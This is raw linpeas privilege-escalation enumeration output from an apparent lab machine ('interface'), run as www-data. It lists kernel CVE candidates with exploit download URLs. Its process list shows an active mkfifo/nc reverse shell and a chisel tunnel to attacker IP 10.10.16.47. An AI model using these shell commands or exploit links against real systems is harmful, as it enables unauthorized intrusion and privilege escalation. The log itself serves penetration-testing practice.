2249 lines
113 KiB
Plaintext
2249 lines
113 KiB
Plaintext
bash /tmp/linpeas.sh -M -e -L -t
|
|
|
|
|
|
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
|
|
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
|
|
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
|
|
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
|
|
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
|
|
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
|
|
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
|
|
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
|
|
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
|
|
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
|
|
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
|
|
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
|
|
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
|
|
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
|
|
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
|
|
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
|
|
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
|
|
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
|
|
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
|
|
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
|
|
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
|
|
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
|
|
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
|
|
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
|
|
|
|
/---------------------------------------------------------------------------------\
|
|
| Do you like PEASS? |
|
|
|---------------------------------------------------------------------------------|
|
|
| Get the latest version : https://github.com/sponsors/carlospolop |
|
|
| Follow on Twitter : @carlospolopm |
|
|
| Respect on HTB : SirBroccoli |
|
|
|---------------------------------------------------------------------------------|
|
|
| Thank you! |
|
|
\---------------------------------------------------------------------------------/
|
|
linpeas-ng by carlospolop
|
|
|
|
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
|
|
|
|
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
|
|
LEGEND:
|
|
RED/YELLOW: 95% a PE vector
|
|
RED: You should take a look to it
|
|
LightCyan: Users with console
|
|
Blue: Users without console & mounted devs
|
|
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
|
|
LightMagenta: Your username
|
|
|
|
Starting linpeas. Caching Writable Folders...
|
|
|
|
╔═══════════════════╗
|
|
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
|
|
╚═══════════════════╝
|
|
OS: Linux version 4.15.0-202-generic (buildd@lcy02-amd64-115) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023
|
|
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
|
Hostname: interface
|
|
Writable folder: /dev/shm
|
|
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
|
|
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
|
|
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
|
|
|
|
|
|
|
|
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . uniq: write error: Broken pipe
|
|
DONE
|
|
|
|
╔════════════════════╗
|
|
══════════════════════════════╣ System Information ╠══════════════════════════════
|
|
╚════════════════════╝
|
|
╔══════════╣ Operative system
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
|
|
Linux version 4.15.0-202-generic (buildd@lcy02-amd64-115) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023
|
|
Distributor ID: Ubuntu
|
|
Description: Ubuntu 18.04.6 LTS
|
|
Release: 18.04
|
|
Codename: bionic
|
|
|
|
╔══════════╣ Sudo version
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
|
|
Sudo version 1.8.21p2
|
|
|
|
╔══════════╣ CVEs Check
|
|
Potentially Vulnerable to CVE-2022-2588
|
|
|
|
|
|
|
|
╔══════════╣ PATH
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
|
|
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
|
|
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
|
|
|
|
╔══════════╣ Date & uptime
|
|
Sun Feb 12 11:11:57 UTC 2023
|
|
11:11:57 up 2:14, 0 users, load average: 0.16, 0.22, 0.30
|
|
|
|
╔══════════╣ System stats
|
|
Filesystem Size Used Avail Use% Mounted on
|
|
udev 952M 0 952M 0% /dev
|
|
tmpfs 197M 9.8M 187M 5% /run
|
|
/dev/mapper/ubuntu--vg-ubuntu--lv 3.5G 3.1G 340M 91% /
|
|
tmpfs 984M 4.0K 984M 1% /dev/shm
|
|
tmpfs 5.0M 0 5.0M 0% /run/lock
|
|
tmpfs 984M 0 984M 0% /sys/fs/cgroup
|
|
/dev/sda2 219M 149M 53M 74% /boot
|
|
total used free shared buff/cache available
|
|
Mem: 2014888 269756 424972 14864 1320160 1542560
|
|
Swap: 1048572 268 1048304
|
|
|
|
╔══════════╣ CPU info
|
|
Architecture: x86_64
|
|
CPU op-mode(s): 32-bit, 64-bit
|
|
Byte Order: Little Endian
|
|
CPU(s): 2
|
|
On-line CPU(s) list: 0,1
|
|
Thread(s) per core: 1
|
|
Core(s) per socket: 1
|
|
Socket(s): 2
|
|
NUMA node(s): 1
|
|
Vendor ID: GenuineIntel
|
|
CPU family: 6
|
|
Model: 85
|
|
Model name: Intel(R) Xeon(R) Gold 5218 CPU @ 2.30GHz
|
|
Stepping: 7
|
|
CPU MHz: 2294.609
|
|
BogoMIPS: 4589.21
|
|
Hypervisor vendor: VMware
|
|
Virtualization type: full
|
|
L1d cache: 32K
|
|
L1i cache: 32K
|
|
L2 cache: 1024K
|
|
L3 cache: 22528K
|
|
NUMA node0 CPU(s): 0,1
|
|
Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon nopl xtopology tsc_reliable nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 invpcid avx512f avx512dq rdseed adx smap clflushopt clwb avx512cd avx512bw avx512vl xsaveopt xsavec xsaves arat pku ospke md_clear flush_l1d arch_capabilities
|
|
|
|
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
|
|
disk
|
|
sda
|
|
sda1
|
|
sda2
|
|
sda3
|
|
|
|
╔══════════╣ Unmounted file-system?
|
|
╚ Check if you can mount umounted devices
|
|
/dev/disk/by-id/dm-uuid-LVM-i3pCcRu1s0TOrvFh0JfLWwVAmyM66tqgFue8hxoPZWT54KAfm6w6w9SmET94QCTF / ext4 defaults 0 0
|
|
/dev/disk/by-uuid/9a15dfee-5052-4de7-86fb-b3ec2b2069ec /boot ext4 defaults 0 0
|
|
/dev/mapper/ubuntu--vg-swap none swap sw 0 0
|
|
|
|
╔══════════╣ Environment
|
|
╚ Any private information inside environment variables?
|
|
LANG=C
|
|
USER=www-data
|
|
PWD=/var/www/.gnupg
|
|
HOME=/var/www
|
|
HISTFILE=/dev/null
|
|
SHLVL=1
|
|
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
|
|
HISTSIZE=0
|
|
HISTFILESIZE=0
|
|
_=/usr/bin/env
|
|
|
|
╔══════════╣ Searching Signature verification failed in dmesg
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
|
|
dmesg Not Found
|
|
|
|
╔══════════╣ Executing Linux Exploit Suggester
|
|
╚ https://github.com/mzet-/linux-exploit-suggester
|
|
cat: write error: Broken pipe
|
|
cat: write error: Broken pipe
|
|
cat: write error: Broken pipe
|
|
cat: write error: Broken pipe
|
|
cat: write error: Broken pipe
|
|
[+] [CVE-2021-4034] PwnKit
|
|
|
|
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
|
|
Exposure: probable
|
|
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
|
|
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
|
|
|
|
[+] [CVE-2021-3156] sudo Baron Samedit
|
|
|
|
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
|
|
Exposure: probable
|
|
Tags: mint=19,[ ubuntu=18|20 ], debian=10
|
|
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
|
|
|
|
[+] [CVE-2021-3156] sudo Baron Samedit 2
|
|
|
|
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
|
|
Exposure: probable
|
|
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
|
|
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
|
|
|
|
[+] [CVE-2018-18955] subuid_shell
|
|
|
|
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
|
|
Exposure: probable
|
|
Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
|
|
Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
|
|
Comments: CONFIG_USER_NS needs to be enabled
|
|
|
|
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
|
|
|
|
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
|
|
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
|
|
Exposure: less probable
|
|
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
|
|
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
|
|
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
|
|
|
|
[+] [CVE-2022-2586] nft_object UAF
|
|
|
|
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
|
|
Exposure: less probable
|
|
Tags: ubuntu=(20.04){kernel:5.12.13}
|
|
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
|
|
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
|
|
|
|
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
|
|
|
|
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
|
|
Exposure: less probable
|
|
Tags: ubuntu=20.04{kernel:5.8.0-*}
|
|
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
|
|
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
|
|
Comments: ip_tables kernel module must be loaded
|
|
|
|
[+] [CVE-2019-18634] sudo pwfeedback
|
|
|
|
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
|
|
Exposure: less probable
|
|
Tags: mint=19
|
|
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
|
|
Comments: sudo configuration requires pwfeedback to be enabled.
|
|
|
|
[+] [CVE-2019-15666] XFRM_UAF
|
|
|
|
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
|
|
Exposure: less probable
|
|
Download URL:
|
|
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
|
|
|
|
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
|
|
|
|
Details: https://seclists.org/oss-sec/2017/q1/184
|
|
Exposure: less probable
|
|
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
|
|
|
|
[+] [CVE-2017-0358] ntfs-3g-modprobe
|
|
|
|
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
|
|
Exposure: less probable
|
|
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
|
|
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
|
|
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
|
|
|
|
|
|
╔══════════╣ Executing Linux Exploit Suggester 2
|
|
╚ https://github.com/jondonas/linux-exploit-suggester-2
|
|
|
|
╔══════════╣ Protections
|
|
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
|
|
apparmor module is loaded.
|
|
═╣ grsecurity present? ............ grsecurity Not Found
|
|
═╣ PaX bins present? .............. PaX Not Found
|
|
═╣ Execshield enabled? ............ Execshield Not Found
|
|
═╣ SELinux enabled? ............... sestatus Not Found
|
|
═╣ Seccomp enabled? ............... disabled
|
|
═╣ AppArmor profile? .............. unconfined
|
|
═╣ User namespace? ................ enabled
|
|
═╣ Cgroup2 enabled? ............... enabled
|
|
═╣ Is ASLR enabled? ............... Yes
|
|
═╣ Printer? ....................... No
|
|
═╣ Is this a virtual machine? ..... Yes (vmware)
|
|
|
|
╔═══════════╗
|
|
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
|
|
╚═══════════╝
|
|
╔══════════╣ Container related tools present
|
|
/usr/bin/lxc
|
|
╔══════════╣ Am I Containered?
|
|
╔══════════╣ Container details
|
|
═╣ Is this a container? ........... No
|
|
═╣ Any running containers? ........ No
|
|
|
|
|
|
╔═══════╗
|
|
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
|
|
╚═══════╝
|
|
═╣ Google Cloud Platform? ............... No
|
|
═╣ AWS ECS? ............................. No
|
|
═╣ AWS EC2? ............................. No
|
|
═╣ AWS Lambda? .......................... No
|
|
|
|
|
|
|
|
╔════════════════════════════════════════════════╗
|
|
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
|
|
╚════════════════════════════════════════════════╝
|
|
╔══════════╣ Cleaned processes
|
|
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
|
|
root 1 0.0 0.4 159652 8792 ? Ss 08:57 0:03 /sbin/init maybe-ubiquity
|
|
root 524 0.2 0.8 95016 16212 ? S<s 08:57 0:16 /lib/systemd/systemd-journald
|
|
root 534 0.0 0.0 105908 1868 ? Ss 08:57 0:00 /sbin/lvmetad -f
|
|
root 551 0.0 0.2 46444 5156 ? Ss 08:57 0:01 /lib/systemd/systemd-udevd
|
|
root 750 0.0 0.0 31984 1880 ? S<sl 08:57 0:04 /sbin/auditd
|
|
systemd+ 769 0.0 0.1 141788 3008 ? Ssl 08:57 0:00 /lib/systemd/systemd-timesyncd
|
|
└─(Caps) 0x0000000002000000=cap_sys_time
|
|
root 887 0.0 0.4 91020 9952 ? Ss 08:57 0:00 /usr/bin/VGAuthService
|
|
root 900 0.1 0.3 225744 7516 ? S<sl 08:57 0:10 /usr/bin/vmtoolsd
|
|
systemd+ 1059 0.0 0.2 71728 5132 ? Ss 08:57 0:00 /lib/systemd/systemd-networkd
|
|
└─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
|
|
systemd+ 1139 0.0 0.2 70756 5896 ? Ss 08:57 0:01 /lib/systemd/systemd-resolved
|
|
root 1166 0.0 0.1 25996 3520 ? Ss 08:57 0:00 /sbin/dhclient -1 -4 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
|
|
root 1270 0.0 0.1 30032 3248 ? Ss 08:57 0:00 /usr/sbin/cron -f
|
|
root 1286 0.0 0.1 110552 2028 ? Ssl 08:57 0:00 /usr/sbin/irqbalance --foreground
|
|
daemon[0m 1287 0.0 0.1 28336 2468 ? Ss 08:57 0:00 /usr/sbin/atd -f
|
|
www-data 1288 0.0 2.0 764896 40944 ? Ssl 08:57 0:00 npm
|
|
www-data 1758 0.0 0.0 4640 876 ? S 08:57 0:00 _ sh -c next start --hostname 127.0.0.1
|
|
www-data 1759 0.0 3.1 11271332 63244 ? Sl 08:57 0:01 _ node /var/www/starting-page/blog/node_modules/.bin/next start --hostname 127.0.0.1
|
|
root 1289 0.0 0.3 286240 6708 ? Ssl 08:57 0:00 /usr/lib/accountsservice/accounts-daemon[0m
|
|
root 1290 0.0 1.0 322720 20740 ? Ss 08:57 0:00 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
|
|
www-data 1386 0.0 1.0 325212 21460 ? S 08:57 0:00 _ php-fpm: pool www
|
|
www-data 3166 0.0 0.0 4636 860 ? S 10:41 0:00 | _ sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.47 4444 >/tmp/f
|
|
www-data 3169 0.0 0.0 4680 816 ? S 10:41 0:00 | _ cat /tmp/f
|
|
www-data 3170 0.0 0.0 4636 1676 ? S 10:41 0:00 | _ sh -i
|
|
www-data 3189 0.1 0.2 9760 4320 ? Sl 10:42 0:03 | | _ /tmp/NJwcm
|
|
www-data 14831 0.0 0.0 4636 828 ? S 10:47 0:00 | | _ /bin/sh
|
|
www-data 14832 0.0 0.2 20344 5148 ? S 10:47 0:00 | | | _ bash /tmp/linpeas.sh -M -e -L -t
|
|
www-data 39396 0.0 0.2 20344 4084 ? S 11:00 0:00 | | | | _ bash /tmp/linpeas.sh -M -e -L -t
|
|
www-data 40732 0.0 0.2 20344 4204 ? S 11:00 0:00 | | | | _ bash /tmp/linpeas.sh -M -e -L -t
|
|
www-data 40734 0.0 0.0 11468 1016 ? S 11:00 0:00 | | | | _ grep -A 256 Ports going to be scanned
|
|
www-data 40735 0.0 0.0 11468 1088 ? S 11:00 0:00 | | | | _ grep -v Ports going to be scanned
|
|
www-data 14833 0.0 0.0 4544 828 ? S 10:47 0:00 | | | _ tee /tmp/peas.log
|
|
www-data 22118 0.0 0.0 4636 820 ? S 10:51 0:00 | | _ /bin/sh
|
|
www-data 22141 0.0 0.4 718304 8292 ? Sl 10:52 0:00 | | | _ ./chisel client 10.10.16.47:8000 R:3000:127.0.0.1:3000
|
|
www-data 44089 0.0 0.0 4636 880 ? S 11:11 0:00 | | _ /bin/sh
|
|
www-data 44091 0.7 0.2 20344 5180 ? S 11:11 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t
|
|
www-data 47476 0.0 0.1 20344 3900 ? S 11:12 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t
|
|
www-data 47479 0.0 0.1 37020 3520 ? R 11:12 0:00 | | | _ ps fauxwww
|
|
www-data 47480 0.0 0.1 20344 2332 ? S 11:12 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t
|
|
www-data 3171 0.0 0.1 15720 2108 ? S 10:41 0:00 | _ nc 10.10.16.47 4444
|
|
www-data 1387 0.0 1.0 325212 20564 ? S 08:57 0:00 _ php-fpm: pool www
|
|
message+ 1292 0.0 0.2 50132 4620 ? Ss 08:57 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
|
|
└─(Caps) 0x0000000020000000=cap_audit_write
|
|
root 1348 0.1 0.1 457232 2036 ? Ssl 08:57 0:08 /usr/bin/lxcfs /var/lib/lxcfs/
|
|
syslog 1382 0.0 0.2 263048 4388 ? Ssl 08:57 0:00 /usr/sbin/rsyslogd -n
|
|
root 1399 0.0 0.8 169524 17548 ? Ssl 08:57 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
|
|
root 1402 0.0 0.2 62012 5548 ? Ss 08:57 0:00 /lib/systemd/systemd-logind
|
|
root 1477 0.0 0.2 72304 5760 ? Ss 08:57 0:00 /usr/sbin/sshd -D
|
|
root 1478 0.0 0.3 288884 6584 ? Ssl 08:57 0:00 /usr/lib/policykit-1/polkitd --no-debug
|
|
root 1498 0.0 0.0 14896 1924 tty1 Ss+ 08:57 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
|
|
root 1625 0.0 0.0 142884 1584 ? Ss 08:57 0:00 nginx: master process /usr/sbin/nginx -g daemon[0m on; master_process on;
|
|
www-data 1627 0.0 0.3 145180 6296 ? S 08:57 0:00 _ nginx: worker process
|
|
www-data 1628 0.0 0.3 145180 7248 ? S 08:57 0:00 _ nginx: worker process
|
|
www-data 3196 0.0 0.2 20340 5056 ? S 10:43 0:00 bash /tmp/linpeas.sh -M -e -L -t
|
|
www-data 10388 0.0 0.1 20340 3900 ? S 10:45 0:00 _ bash /tmp/linpeas.sh -M -e -L -t
|
|
www-data 11709 0.0 0.2 20340 4128 ? S 10:45 0:00 _ bash /tmp/linpeas.sh -M -e -L -t
|
|
www-data 11711 0.0 0.0 11468 1048 ? S 10:45 0:00 _ grep -A 256 Ports going to be scanned
|
|
www-data 11712 0.0 0.0 11468 980 ? S 10:45 0:00 _ grep -v Ports going to be scanned
|
|
root 9709 0.0 0.0 4560 756 ? Ss 10:44 0:00 /usr/sbin/acpid
|
|
uuidd 9948 0.0 0.0 26856 1456 ? Ss 10:44 0:00 /usr/sbin/uuidd --socket-activation
|
|
www-data 22149 0.1 0.2 21276 6000 ? S 10:53 0:01 bash linpeas.sh
|
|
www-data 39291 0.0 0.0 11076 1064 ? S 10:54 0:00 _ aureport --tty
|
|
www-data 39292 0.0 0.0 11468 1032 ? S 10:54 0:00 _ grep -E su |sudo
|
|
www-data 29484 0.0 0.0 90388 716 ? Ss 10:54 0:00 gpg-agent --homedir /var/www/.gnupg --use-standard-socket --daemon
|
|
|
|
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
|
|
|
|
╔══════════╣ Files opened by processes belonging to other users
|
|
╚ This is usually empty because of the lack of privileges to read other user processes information
|
|
COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME
|
|
|
|
╔══════════╣ Processes with credentials in memory (root req)
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
|
|
gdm-password Not Found
|
|
gnome-keyring-daemon Not Found
|
|
lightdm Not Found
|
|
vsftpd Not Found
|
|
apache2 Not Found
|
|
sshd Not Found
|
|
|
|
╔══════════╣ Cron jobs
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
|
|
/usr/bin/crontab
|
|
incrontab Not Found
|
|
-rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab
|
|
|
|
/etc/cron.d:
|
|
total 24
|
|
drwxr-xr-x 2 root root 4096 Jan 16 09:49 .
|
|
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
|
|
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
|
|
-rw-r--r-- 1 root root 589 Jan 14 2020 mdadm
|
|
-rw-r--r-- 1 root root 712 Jan 11 2022 php
|
|
-rw-r--r-- 1 root root 191 Aug 6 2020 popularity-contest
|
|
|
|
/etc/cron.daily:
|
|
total 60
|
|
drwxr-xr-x 2 root root 4096 Feb 6 10:02 .
|
|
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
|
|
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
|
|
-rwxr-xr-x 1 root root 539 Feb 23 2021 apache2
|
|
-rwxr-xr-x 1 root root 376 Nov 11 2019 apport
|
|
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
|
|
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
|
|
-rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg
|
|
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
|
|
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
|
|
-rwxr-xr-x 1 root root 539 Jan 14 2020 mdadm
|
|
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
|
|
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
|
|
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
|
|
-rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common
|
|
|
|
/etc/cron.hourly:
|
|
total 12
|
|
drwxr-xr-x 2 root root 4096 Jan 16 09:49 .
|
|
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
|
|
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
|
|
|
|
/etc/cron.monthly:
|
|
total 12
|
|
drwxr-xr-x 2 root root 4096 Jan 16 09:49 .
|
|
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
|
|
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
|
|
|
|
/etc/cron.weekly:
|
|
total 20
|
|
drwxr-xr-x 2 root root 4096 Feb 6 10:01 .
|
|
drwxr-xr-x 99 root root 4096 Feb 6 10:02 ..
|
|
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
|
|
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
|
|
-rwxr-xr-x 1 root root 403 Aug 23 2021 update-notifier-common
|
|
|
|
SHELL=/bin/sh
|
|
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
|
|
|
|
17 * * * * root cd / && run-parts --report /etc/cron.hourly
|
|
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
|
|
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
|
|
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
|
|
|
|
╔══════════╣ Services
|
|
╚ Search for outdated versions
|
|
[ + ] acpid
|
|
[ + ] apache-htcacheclean
|
|
[ - ] apache2
|
|
[ + ] apparmor
|
|
[ + ] apport
|
|
[ + ] atd
|
|
[ + ] auditd
|
|
[ - ] console-setup.sh
|
|
[ + ] cron
|
|
[ - ] cryptdisks
|
|
[ - ] cryptdisks-early
|
|
[ + ] dbus
|
|
[ + ] ebtables
|
|
[ + ] grub-common
|
|
[ - ] hwclock.sh
|
|
[ + ] irqbalance
|
|
[ + ] iscsid
|
|
[ - ] keyboard-setup.sh
|
|
[ + ] kmod
|
|
[ - ] lvm2
|
|
[ + ] lvm2-lvmetad
|
|
[ + ] lvm2-lvmpolld
|
|
[ + ] lxcfs
|
|
[ - ] lxd
|
|
[ - ] mdadm
|
|
[ - ] mdadm-waitidle
|
|
[ + ] networking
|
|
[ + ] nginx
|
|
[ - ] open-iscsi
|
|
[ + ] open-vm-tools
|
|
[ + ] php7.4-fpm
|
|
[ - ] plymouth
|
|
[ - ] plymouth-log
|
|
[ + ] procps
|
|
[ - ] rsync
|
|
[ + ] rsyslog
|
|
[ - ] screen-cleanup
|
|
[ + ] ssh
|
|
[ + ] udev
|
|
[ + ] uuidd
|
|
|
|
╔══════════╣ Systemd PATH
|
|
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
|
|
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
|
|
